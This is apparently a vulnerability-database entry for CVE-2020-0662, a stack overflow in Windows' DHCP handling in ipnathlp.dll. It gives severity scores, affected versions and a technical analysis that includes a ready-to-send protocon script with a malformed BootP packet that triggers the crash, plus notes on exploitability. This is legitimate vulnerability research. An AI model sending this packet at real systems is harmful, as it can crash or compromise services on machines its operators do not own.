Attacker Value
Moderate
(1 user assessed)
Exploitability
Moderate
(1 user assessed)
User Interaction
None
Privileges Required
Low
Attack Vector
Network
0

CVE-2020-0662

Disclosure Date: February 11, 2020
CVE-2020-0662 CVSS v3 Base Score: 8.8
Add MITRE ATT&CK tactics and techniques that apply to this CVE.

Description

A remote code execution vulnerability exists in the way that Windows handles objects in memory, aka ‘Windows Remote Code Execution Vulnerability’.

Add Assessment

6
Ratings
  • Attacker Value
    Medium
  • Exploitability
    Medium
Common in enterpriseGives privileged accessUnauthenticatedVulnerable in uncommon configuration
Technical Analysis

Analysis performed using ipnathlp.dll from Windows Server 2019 x64 (sha256: c5bfdd192eaac8ffa8c0ee9c5fbb719eb739518a0635dc5cba42f52ab7efefa9)

Overview

CVE-2020-0662 is a stack based buffer overflow occurring in svchost.exe due to an unchecked size argument to a memcpy call in ipnathlp.dll!DhcpAddArpEntry. The size argument is restricted to 0-255 inclusive as it must fit in a uint8_t variable. The size argument for the affected memcpy call is taken from the “Hardware address length” field from a DHCP/BootP message.

In order to hit the vulnerable code path and trigger the bug, the size (hardware address length) field must be sufficiently large, and the DHCP option 53 / 0x34 (DHCP Message Type) must be omitted.

The following protocon script can be used to trigger the crash:

# Dynamic Host Configuration Protocol
#     Message type: Boot Request (1)
#     Hardware type: Ethernet (0x01)
#     Hardware address length: 255
#     Hops: 0
#     Transaction ID: 0x5df26992
#     Seconds elapsed: 1
#     Bootp flags: 0x0000 (Unicast)
#     Client IP address: 0.0.0.0
#     Your (client) IP address: 0.0.0.0
#     Next server IP address: 0.0.0.0
#     Relay agent IP address: 0.0.0.0
#     Client MAC address: Vmware_84:05:fd (00:0c:29:84:05:fd)
#     Client hardware address padding: 00000000000000000000
#     Server host name not given
#     Boot file name not given
#     Magic cookie: DHCP
#     Option: (255) End
#         Option End: 255

set encoding hex
send 0101ff005df269920001000000000000000000000000000000000000000c298405fd0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000063825363ff
exit

On a Windows Server 2019 installation, this process is protected by stack cookies making exploitation non-trival. The cookie value would need to be leaked and the service which hosts the DLL is not configured to automatically start. To make a system vulnerable, an interface must be marked as “Shared”. To do this:

  1. Open the power user menu with Win+X and select “Network Connections”
  2. From the Network Connections window, select “Change adapter options”
  3. Right click an adapter which has an internet connection and select “Properties”
  4. Navigate to the “Sharing” tab and check “Allow other network users to connect through this computer’s Internet connection”
  5. Click “OK”

Vulnerable Code Path

  1. ipnathlp!DhcpProcessMessage
  2. ipnathlp!DhcpProcessBootpMessage
    • Only invoked if the DHCP Message Type option is omitted
  3. ipnathlp!DhcpAddArpEntry
    • Second memcpy call is the vulnerability, the size argument is
      under attacker control

Crash Notes

The target process uses stack canaries, so overwriting the stack would
require a leak. The original structure is a MIB_IPNET_ROW2
instance. Of note here is that the PhysicalAddressLength field is
located after the PhysicalAddress field and is set before the memcpy
call. This could allow an attacker to overwrite the this field.

Immediately following this operation, the row is passed to
iphlpapi!CreateIpNetEntry2 where the PhysicalAddressLength field
is subjected to proper boundary checking (<= 0x20).

Windows 7 Notes

Windows 7 does not appear to be a viable exploit target because the affected memcpy call is not present due to an older API being used. There is a memcmp instruction to which the size parameter can be controlled but this would result in a OOB read which is much less useful.

Log in to Add Reply
CVSS V3 Severity and Metrics
Base Score:
8.8 High
Impact Score:
5.9
Exploitability Score:
2.8
Vector:
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
Attack Vector (AV):
Network
Attack Complexity (AC):
Low
Privileges Required (PR):
Low
User Interaction (UI):
None
Scope (S):
Unchanged
Confidentiality (C):
High
Integrity (I):
High
Availability (A):
High

General Information

Offensive Application
Unknown
Utility Class
Unknown
Ports
Unknown
OS
Unknown
Vulnerable Versions
Windows 10 Version 1803 for x64-based Systems
Windows 10 Version 1809 for x64-based Systems
Windows 10 Version 1709 for x64-based Systems
Windows 10 for x64-based Systems
Windows 10 Version 1607 for x64-based Systems
Windows 7 for x64-based Systems Service Pack 1
Windows 8.1 for x64-based systems
Windows Server version 1803 (Core Installation)
Windows Server 2019
Windows Server 2019 (Core installation)
Windows Server 2016
Windows Server 2016 (Core installation)
Windows Server 2008 for x64-based Systems Service Pack 2
Windows Server 2008 for x64-based Systems Service Pack 2 (Core installation)
Windows Server 2008 R2 for x64-based Systems Service Pack 1
Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Core installation)
Windows Server 2012
Windows Server 2012 (Core installation)
Windows Server 2012 R2
Windows Server 2012 R2 (Core installation)
Windows 10 Version 1903 for x64-based Systems
Windows Server, version 1903 (Server Core installation)
Windows 10 Version 1909 for x64-based Systems
Windows Server, version 1909 (Server Core installation)
Prerequisites
Unknown
Discovered By
Unknown
PoC Author
Unknown
Metasploit Module
Unknown
Reporter
Unknown

Vendors

  • microsoft

Products

  • windows 10 -,
  • windows 10 1607,
  • windows 10 1709,
  • windows 10 1803,
  • windows 10 1809,
  • windows 10 1903,
  • windows 10 1909,
  • windows 7 -,
  • windows 8.1 -,
  • windows server 2008 -,
  • windows server 2008 r2,
  • windows server 2012 -,
  • windows server 2012 r2,
  • windows server 2016 -,
  • windows server 2016 1803,
  • windows server 2016 1903,
  • windows server 2016 1909,
  • windows server 2019 -

Additional Info

Authenticated
Unknown
Exploitable
Unknown
Reliability
Unknown
Stability
Unknown
Available Mitigations
Unknown
Shelf Life
Unknown
Userbase/Installbase
Unknown
Patch Effectiveness
Unknown
Technical Analysis